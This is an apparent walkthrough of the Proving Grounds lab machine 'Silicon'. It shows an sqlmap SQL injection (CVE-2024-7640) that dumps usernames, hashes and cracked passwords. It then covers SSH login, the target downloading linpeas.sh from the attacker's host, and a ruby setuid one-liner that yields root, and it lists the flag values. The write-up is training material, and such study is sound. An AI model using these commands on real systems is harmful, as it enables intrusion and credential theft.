Summary #
On port 8000 there is a webapplication called: KORTEX ADVOCATED OFFICE SOFTWARE. This software is vulnerable for manipulation of the argument case_register_id, which leads to SQL injection (CVE-2024-7640). Using this, we can dump username and password hashes. With the use of CrackStation we can crack all password hashes and get initial access as the agbana user. We then find added capabilities to the /usr/bin/ruby3.1 binary (/usr/bin/ruby3.1 cap_setuid=ep) which we can use to escalate our privileges to the root user.
Specifications #
- Name: SILICON
- Platform: PG PRACTICE
- Points: 10
- Difficulty: Intermediate
- System overview: Linux silicon 6.1.0-30-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.124-1 (2025-01-12) x86_64 GNU/Linux
- IP address: 192.168.135.197
- OFFSEC provided credentials: None
- HASH:
local.txt:8bb6f2ab7a5ef4f4605d0d639b3b9d77 - HASH:
proof.txt:ac8fb02039885af2c99f1ffd236cf733
Preparation #
First we’ll create a directory structure for our files, set the IP address to a bash variable and ping the target:
## create directory structure
mkdir silicon && cd silicon && mkdir enum files exploits uploads tools
## list directory
ls -la
total 28
drwxrwxr-x 7 kali kali 4096 Sep 13 19:00 .
drwxrwxr-x 64 kali kali 4096 Sep 13 19:00 ..
drwxrwxr-x 2 kali kali 4096 Sep 13 19:00 enum
drwxrwxr-x 2 kali kali 4096 Sep 13 19:00 exploits
drwxrwxr-x 2 kali kali 4096 Sep 13 19:00 files
drwxrwxr-x 2 kali kali 4096 Sep 13 19:00 tools
drwxrwxr-x 2 kali kali 4096 Sep 13 19:00 uploads
## set bash variable
ip=192.168.135.197
## ping target to check if it's online
ping $ip
PING 192.168.135.197 (192.168.135.197) 56(84) bytes of data.
64 bytes from 192.168.135.197: icmp_seq=1 ttl=61 time=17.7 ms
64 bytes from 192.168.135.197: icmp_seq=2 ttl=61 time=20.2 ms
^C
--- 192.168.135.197 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 17.734/18.970/20.206/1.236 ms
Reconnaissance #
Portscanning #
Using Rustscan we can see what TCP ports are open. This tool is part of my default portscan flow.
## run the rustscan tool
sudo rustscan -a $ip | tee enum/rustscan
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: allowing you to send UDP packets into the void 1200x faster than NMAP
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.135.197:22
Open 192.168.135.197:80
Open 192.168.135.197:8000
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-13 19:02 CEST
Initiating Ping Scan at 19:02
Scanning 192.168.135.197 [4 ports]
Completed Ping Scan at 19:02, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:02
Completed Parallel DNS resolution of 1 host. at 19:02, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:02
Scanning 192.168.135.197 [3 ports]
Discovered open port 22/tcp on 192.168.135.197
Discovered open port 8000/tcp on 192.168.135.197
Discovered open port 80/tcp on 192.168.135.197
Completed SYN Stealth Scan at 19:02, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.135.197
Host is up, received echo-reply ttl 61 (0.017s latency).
Scanned at 2025-09-13 19:02:28 CEST for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 61
80/tcp open http syn-ack ttl 61
8000/tcp open http-alt syn-ack ttl 61
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds
Raw packets sent: 7 (284B) | Rcvd: 4 (160B)
Copy the output of open ports into a file called ports within the files directory.
## edit the ``files/ports` file
nano files/ports
## content `ports` file:
22/tcp open ssh syn-ack ttl 61
80/tcp open http syn-ack ttl 61
8000/tcp open http-alt syn-ack ttl 61
Run the following command to get a string of all open ports and use the output of this command to paste within NMAP:
## get a list, comma separated of the open port(s)
cd files && cat ports | cut -d '/' -f1 > ports.txt && awk '{printf "%s,",$0;n++}' ports.txt | sed 's/.$//' > ports && rm ports.txt && cat ports && cd ..
## output previous command
22,80,8000
## use this output in the `nmap` command below:
sudo nmap -T3 -p 22,80,8000 -sCV -vv $ip -oN enum/nmap-services-tcp
Output of NMAP:
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0)
| ssh-hostkey:
| 256 fc:72:06:8f:ef:ec:9b:87:f3:95:ca:f2:e7:1f:ea:dc (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFyksaWzSNfPbN6T3ts7+fGJ0/9aIXrN7HimSzjO+W6pfa1Qq4QZb/hnkglJwvjgcTOQiraq2M9EQ9JtbRC1ROY=
| 256 42:c2:f0:fd:85:f6:93:cb:bd:a0:e8:ed:c1:a2:6d:60 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHbDRRUQ2YifMbadcFEg6fdgQ2bcGEHcQyrud/UFwLiy
80/tcp open http syn-ack ttl 61 nginx 1.22.1
|_http-favicon: Unknown favicon MD5: 5C5FDF4922811C975357C233CBD0AE34
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-generator: Winter CMS
|_http-server-header: nginx/1.22.1
|_http-title: Winter CMS - Demonstration
8000/tcp open http syn-ack ttl 61 nginx 1.22.1
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.22.1
|_http-title: Kortex lite - Advocate office Software
| http-methods:
|_ Supported Methods: GET HEAD POST
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Initial Access #
8000/tcp open http syn-ack ttl 61 nginx 1.22.1
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.22.1
|_http-title: Kortex lite - Advocate office Software
| http-methods:
|_ Supported Methods: GET HEAD POST
On port 8000 there’s an webapplication called: KORTEX ADVOCATED OFFICE SOFTWARE.
The source code can be found here: https://www.sourcecodester.com/php/17280/advocate-office-management-system-free-download.html. Once you download and unzip the ZIP file, there is a directory called credentials with the default credentials of the application.
cat Username\ and\ Password.txt
Username : mayuri.infospace@gmail.com
Password : admin
-----------------------------------------------------------
Download other free/paid projects at : www.mayurik.com
Get more ideas, Check Youtube Channel : https://www.youtube.com/c/MayuriK
Using these credentials: mayuri.infospace@gmail.com:admin we get a 504 error.
However, when we look at: https://github.com/zyairelai/CVE-submissions/blob/main/kortex-register_case-sqli.md (CVE-2024-7640), there is a vulnerability, manipulation of the argument case_register_id leads to SQL injection. There is a PoC provided using sqlmap. So, let’s try this. Indeed, we get a dump of the available databases on the target. Let’s now, dump the internal database.
## dump list of databases using `sqlmap`
sqlmap -u "http://$ip:8000/control/edit_register.php?case_register_id=1" --dbs --batch
___
__H__
___ ___["]_____ ___ ___ {1.9.8#stable}
|_ -| . [,] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
<SNIP>
[16:43:16] [INFO] fetching database names
[16:43:16] [INFO] fetching number of databases
[16:43:16] [INFO] retrieved: 4
[16:43:21] [INFO] retrieved:
[16:43:27] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[16:44:32] [INFO] retrieved: kortex
[16:44:57] [INFO] retrieved: internal
[16:45:26] [INFO] retrieved: churchcms
available databases [4]:
[*] churchcms
[*] information_schema
[*] internal
[*] kortex
<SNIP>
## dump entire database `internal`
sqlmap -u "http://$ip:8000/control/edit_register.php?case_register_id=1" -D internal --dump --batch
___
__H__
___ ___[.]_____ ___ ___ {1.9.8#stable}
|_ -| . [)] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
<SNIP>
+----+-----------+-----------------------------------------------+----------+
| id | role | password | username |
+----+-----------+-----------------------------------------------+----------+
| 1 | Marketing | d6ebd5e9d8119e88e28a6b547f66ab5f (daddysgirl) | Woyomi |
| 2 | Sales | f6bca54ae53b1e1d57a20a6cebd7a99e (football1) | Dzalili |
| 3 | HR | 1c13465e24d91aca4d3ddaa1bc3e7027 (wicked) | NanaAddo |
| 4 | Finance | 7ef6156c32f427d713144f67e2ef14d2 (12qwaszx) | Shamew |
| 5 | IT | 13bbf54a6850c393fb8d1b2b3bba997b (******) | Agbana |
+----+-----------+-----------------------------------------------+----------+
<SNIP>
This gets us a list of usernames and password hashes. Let’s use CrackStation (https://crackstation.net/) to try to crack the hashes.
They all crack. When we use these credentials (agbana:******) we can get initial access, using SSH, as the agbana in the /home/agbana directory.
## get initial access via SSH using these credentials `agbana:******`
ssh agbana@$ip
The authenticity of host '192.168.135.197 (192.168.135.197)' can't be established.
ED25519 key fingerprint is SHA256:DklQpxrLtoaufgj7p+2aDA6cAHCcLgqzj6qfqHm1nHw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.135.197' (ED25519) to the list of known hosts.
agbana@192.168.135.197's password:
Linux silicon 6.1.0-30-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.124-1 (2025-01-12) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
agbana@silicon:~$
## print `local.txt`
agbana@silicon:~$ cat local.txt
8bb6f2ab7a5ef4f4605d0d639b3b9d77
Privilege Escalation #
Now, upload linpeas.sh to the target and run it.
## change directory locally
cd uploads
## download latest version of linpeas.sh
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
## get local IP address on tun0
ip a s tun0 | grep "inet " | awk '{print $2}' | sed 's/\/.*//g'
192.168.45.211
## start local webserver
python3 -m http.server 80
## on target
## download `linpeas.sh`
agbana@silicon:~$ wget http://192.168.45.211/linpeas.sh
--2025-09-13 16:38:29-- http://192.168.45.211/linpeas.sh
Connecting to 192.168.45.211:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 961834 (939K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[=======================================>] 939.29K --.-KB/s in 0.1s
2025-09-13 16:38:29 (6.15 MB/s) - ‘linpeas.sh’ saved [961834/961834]
## set the execution bit
agbana@silicon:~$ chmod +x linpeas.sh
## run `linpeas.sh`
agbana@silicon:~$ ./linpeas.sh
The linpeas.sh output shows the binary with added capabilities (Effective and Permitted), /usr/bin/ruby3.1 cap_setuid=ep. Using GTFOBins (https://gtfobins.github.io/gtfobins/ruby/#capabilities), we can escalate our privileges to the root user.
## escalate to `root` user using `ruby3.1` added capabilities
agbana@silicon:/$ /usr/bin/ruby3.1 -e 'Process::Sys.setuid(0); exec "/bin/sh"'
#
## print current user
# whoami
root
## print `proof.txt`
# cat /root/proof.txt
ac8fb02039885af2c99f1ffd236cf733
References #
[+] https://www.sourcecodester.com/php/17280/advocate-office-management-system-free-download.html
[+] https://github.com/zyairelai/CVE-submissions/blob/main/kortex-register_case-sqli.md
[+] https://crackstation.net/
[+] https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
[+] https://gtfobins.github.io/gtfobins/ruby/#capabilities